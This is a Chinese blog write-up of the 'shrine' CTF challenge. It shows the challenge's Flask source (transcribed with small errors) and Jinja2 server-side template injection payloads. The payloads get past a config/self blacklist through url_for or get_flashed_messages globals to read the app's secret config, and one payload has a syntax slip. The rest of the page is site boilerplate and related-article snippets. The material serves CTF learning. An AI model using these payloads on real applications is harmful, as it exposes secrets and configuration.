【攻防世界】shrine

最新推荐文章于 2024-05-17 15:15:42 发布
最新推荐文章于 2024-05-17 15:15:42 发布
阅读量203 收藏
点赞数 2
文章标签: php 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangzhemvp/article/details/137404485
版权 
import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()\

@app.route('/shrine/')
def shrine(shrine):
   
   def safe_jinja(s):
       s = s.replace('(', '').replace(')', '')
       blacklist = ['config', 'self']
       return ''.join(['{{% set {}=None%}}'.format(c)for c in blacklist]) + s
       return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
    app.run(debug=True)

(1)app.config['FLAG']:把FLAG放到app里

(2)blacklist = ['config', 'self']:黑名单,但flag在config文件里

重点

如果没有黑名单,直接用 {{config}}。(一般ctf把flag藏在config里);

如果config,self不能使用,就用 {{url_for.__globals__['current_app'].config}}

或者 {{get_flashed_messages.__globals__['current_app'].config}}

{{url_for.__globals__['current_app'].config.FLAG}}

{{get_flashed_messages.__globals__['current_app'].config.['FLAG']}}

echo‘’wang
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
攻防世界 shrine 详解
xmj818719的博客
03-29 1796
打开题目 整理源码 代码审计: 目标 config['FLAG'] 过滤了 config,self 这两个函数的过滤没看懂,总之好像也没过滤掉(应该是过滤了后面的变量),圆括号是彻底的被过滤掉了,URL编码都没用(刚开始想测试XSS来着) 做完后,拿编译器跑了一下带config的payload也没发现过滤 回归正题 2个@app.route 为路由 第一个是 / 使用URL/ 可访问index()也就是刚刚开始显示的源码 第二个...
攻防世界shrine
weixin_52268949的博客
02-28 520
shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinja(s):
[CTF/网络安全] 攻防世界 shrine 解题详析
等风来
07-24 3749
以上为[CTF/网络安全] 攻防世界 shrine 解题详析,考察Jinja2之SSTI注入。我是秋说,我们下次见。
攻防世界-shrine
MILLOPE的博客
10-14 192
题目 传送门 WP 打开题目 有一段代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(s):
攻防世界shrine 模板注入
qq_43774856的博客
12-16 299
shrine 打开链接,这里直接给出了源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def
shrine-commerce
04-04
MDC-100系列代码实验室入门要获得Flutter入门方面的帮助,请查看我们的在线。
Shrine View-crx插件
04-07
在每次打开一个新标签时,从谷歌地图的卫星视图体验一个有趣的日语Shinto神社。 每次打开一个新选项卡,从谷歌地图的卫星视图享受神社的形象。 神社从5000多点随机选择。 语言:日本語
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
shrine, ruby 应用程序的文件附件工具包.zip
09-18
shrine, ruby 应用程序的文件附件工具包 神殿Shrine是 ruby 应用程序中文件附件的工具包。如果你不确定为什么要小心,那么鼓励你阅读的动机,创建神殿的Shrine 。资源文档:shrinerb.com源:github....
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 733
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 444
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
FebHost:为什么企业需要注册保加利亚.BG域名?
05-16 375
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
等保测评实体分享three
ddcajdkdl的博客
05-16 925
它除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的盲点,入侵者可利用这些机器达到攻击的目标。NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于它不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。
春秋云境CVE-2022-25487
2303_76653367的博客
05-15 310
Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
Laravel中使用MinIO进行文件操作及ZIP解压
我码玄黄的博客
05-14 351
在本指南中,我们将详细介绍如何在laravel框架中操作minio,包含方法有:桶列表,创建桶,修改桶,上传文件,删除文件,生成直传链接,解压zip的php脚本
春秋云境CVE-2023-50564
最新发布
2303_76653367的博客
05-17 445
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
PHP 自提时间
qq_51110402的博客
05-14 257
【代码】PHP 自提时间。
[muduo网络库]——muduo库Thread类(剖析muduo网络库核心部分、设计思想)
m0_73537205的博客
05-14 329
muduo 是由陈硕大佬个人开发的 TCP 网络库,本专栏使用c++11重构了Muduo库中核心的Multi-Reactor架构,剖析大佬核心的代码设计思想,希望能够理清自己的思路,也希望能够帮助到大家。
centos7.9安装PHP运行环境
可乐要加冰
05-14 803
进一步验证,直接在 nginx配置的root目录下 创建静态文件 test.txt,赋予(chmod 777)权限,依然一样。这个教程可能会报错:undefined symbol: php_pdo_register_driver in Unknown on line 0。文件确认存在,路径配置正确,赋予所有用户及用户组可以访问权限,最后还是访问不到。它的作用简单说就是:增强型访问控制,限制到最小访问权限。同时 nginx安装的默认首页又是能访问的。sqlsrv正常添加到 /etc/php.ini 中即可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值